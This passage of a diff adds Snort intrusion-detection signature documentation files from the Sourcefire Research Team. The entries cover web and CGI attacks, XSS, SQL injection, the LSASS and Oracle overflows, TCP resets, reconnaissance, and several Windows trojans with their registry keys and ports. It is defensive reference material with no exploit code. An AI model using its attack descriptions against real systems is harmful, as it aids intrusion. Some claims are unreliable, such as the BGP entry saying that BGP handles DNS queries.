+All systems running CGI applications using SimpleBoard SBP
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1551.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1551
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2509.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2509
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1007.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1007
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1528.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1528
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1962.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1962
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rquotad is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rquotad is using.  Attackers can also learn what versions of the rquotad protocol are accepted by rquotad. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rquotad run.  The rquotad RPC service can be queried for user disk usage and the limits of a local file system which is mounted by a remote machine over the NFS.  A vulnerability associated with rquotad may permit the execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rquotad runs.  This may be a precursor to accessing rquotad.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rquotad, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rquotad, not probes of the rquotad service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rquotad service itself. An attacker may attempt to go directly to the rquotad port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1300.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1300
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/731.txt
@@ -0,0 +1,97 @@
+Rule:
+
+--
+Sid:
+731
+
+--
+Summary:
+QAZ is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry.
+
+The Trojan changes system startup files and registry settings to add the QAZ sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	108	QAZ Worm Client Login access
+	731	Virus - Possible QAZ Worm (Indicates worm activity)
+	775	Virus - Possible QAZ Worm Infection (Indicates worm activity)
+	733	Virus - Possible QAZ Worm Calling Home (Indicates the worm is trying to send mail)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+
+Registry keys added are:
+
+	StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq
+
+This will start the Trojan each time notepad is executed.
+
+Look for the existence of the file note.com. The file notepad.exe may have been replaced with a Trojaned version that is approximately 120 kb in size (the original is 52 kb).
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS501
+http://www.whitehats.com/info/IDS498
+http://www.whitehats.com/info/IDS499
+
+McAfee
+http://vil.nai.com/vil/content/v_98775.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.qaz.a.html
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/qaz.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2601.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2601
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_master_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck87.html
+
+--
--- /dev/null
+++ b/doc/signatures/119.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+119
+
+--
+Summary:
+Doly is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine. Later versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry, Win.ini and System.ini. When first executed the Trojan replicates itself and in most cases, gives the copy a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+The Trojan changes system startup files and registry settings to add the Doly sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	119	Doly 2.0 access (outgoing TCP connection)
+	1985	Doly 1.5 server response (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
+	HKEY_LOCAL_MACHINE\Hardware\Data
+	HKEY_LOCAL_MACHINE\Hardware\Enum
+	HKEY_LOCAL_MACHINE\Software\Microsoft\DirectXMedia
+
+Registry keys added are:
+
+	HKEY_CLASSES_ROOT\.dl
+
+Removal of the replicant is also required, look for files ending in ".exe" or ".dll" in the <drive>:\Windows\ or <drive>:\Windows\System\ folders that use alphanumeric file names. The name of the replicant may be in one of the registry keys above.
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS312
+
+Hackfix
+http://www.hackfix.org/miscfix/doly.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/doly/index.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000514.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000514
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "SAPHPLesson" application running on a webserver. Access 
+to the file "misc.php" with SQL commands being passed as the "action" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "action" parameter in the "misc.php" script used by the 
+"SAPHPLesson" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SAPHPLesson
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2523.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2523
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Transmission Control Protocol (TCP) used in Border
+Gateway Protocol (BGP).
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+The Border Gateway Protocol uses TCP to maintain sessions when handling
+DNS queries. A vulnerability in the core implementation of TCP may make
+it possible for an attacker to reset a number of connections and cause a
+Denial of Service (DoS) to occur.
+
+The attack is possible because the listening service will accept a TCP
+sequence number within a range of what is expected in an established
+session. Since BGP relies on an established TCP session state, guessing
+a suitable sequence number to reset connections is feasible.
+
+--
+Affected Systems:
+	Various implementations of TCP by multiple vendors
+
+--
+Attack Scenarios:
+An attcker needs to send a specially crafted packet to reset a
+connection.
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1606.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1606
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/145.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+145
+
+--
+Summary:
+Girlfriend is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry. When first executed the Trojan replicates itself and in most cases, gives the copy the name Windll.exe. This file is located in the <drive>:\windows\ directory.
+
+The Trojan server opens port 21554 by default. This port may be changed by the attacker's client after initial connection.
+
+	SID	Message
+	---	-------
+	145	GirlFriendaccess
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+
+Registry keys added:
+
+	Windll.exe
+
+Removal of the file Windll.exe is required. Also end the process Windll.exe.
+
+A machine reboot may be required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS98
+
+Dark-e
+http://www.dark-e.com/archive/trojans/girl/135/index.shtml
+
+NTSecurity.net
+http://www.ntsecurity.net/Panda/Index.cfm?FuseAction=Virus&VirusID=400
+
+--
--- /dev/null
+++ b/doc/signatures/2115.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+2115
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in the Mike Bobbit Album.pl cgi application.
+
+--
+Impact:
+Execution of arbitrary code with the privileges of the user executing the cgi application.
+
+--
+Detailed Information:
+The MIke Bobbit Album is a Perl CGI script used for managing pictures on a webserver.
+
+A vulnerability exists such that an attacker may execute arbitrary commands on the server when a non-standard configuration file is used.
+
+Affected Systems:
+	Mike Bobbit Album 0.61.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7444
+
+--
--- /dev/null
+++ b/doc/signatures/1789.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1789
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
--- /dev/null
+++ b/doc/signatures/504.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+504
+
+--
+Summary:
+This event is generated when possible non-legitimate traffic is detected
+that should not be allowed through a firewall.
+
+--
+Impact:
+This can be used to pass through a poorly configured firewall.
+
+--
+Detailed Information:
+
+Traffic from TCP port 53 is used by DNS servers for zone transfers.  
+Normal DNS traffic uses the UDP protocol.  An attacker could use a TCP 
+source port of 53 to pass through a poorly configured firewall.  DNS 
+traffic from port 53 using either UDP or TCP should be to a port above 
+1023.  Ports 1023 and below are privileged.
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+An attacker could use a source port of 53 for TCP connections to bypass 
+a poorly configured firewall.  
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Incoming connections from TCP port 53 should only be allowed to machines
+that need the ability to do zone tranfers.  
+
+Connections from TCP port 53 should only be allowed to ports >=1024 on 
+these machines.  
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS07
+
+--
--- /dev/null
+++ b/doc/signatures/505.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+SID:
+505
+
+--
+Summary:
+This event is generated when an attempt is made to login to a Timbuktu server using an unencrypted link.
+
+--
+Impact:
+Serious. Unauthorized access to the server.
+
+--
+Detailed information:
+Looks at the initial hex code of a Timbuktu client login and captures the login and password  combination. 
+
+This is a poor security practice over the open internet and on untrusted network links. This is a  Timbuktu login going over plaintext to the Timbuktu server.
+
+That means that anyone sniffing the wire can now use the login and password used to gain access to  the Timbuktu server.
+
+--
+Affected Systems:
+	Windows all versions
+	Mac OS 7.5.3 and later
+
+--
+Attack Scenario:
+An attacker can use a sniffer to gain the user login credentials and use the information to gain unauthorized access to the machine.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+Timbuktu may use a port other than 1417 
+
+--
+Corrective Action:
+Use Timbuktu over encrypted links or only on local LANs
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Jake Babbin 
+
+--
+References: 
+
+Arachnids:
+arachnids 229 
+
+--
--- /dev/null
+++ b/doc/signatures/1241.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1241
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/375.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+375
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Linux or Berkeley Systems Development (BSD) host running the reconnaissance tool SING.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running Linux or BSD using the SING reconnaissance tool contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Ofir Arkin < ofir@sys-security.com> 
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS447
+
+--
--- /dev/null
+++ b/doc/signatures/100000594.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000594
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
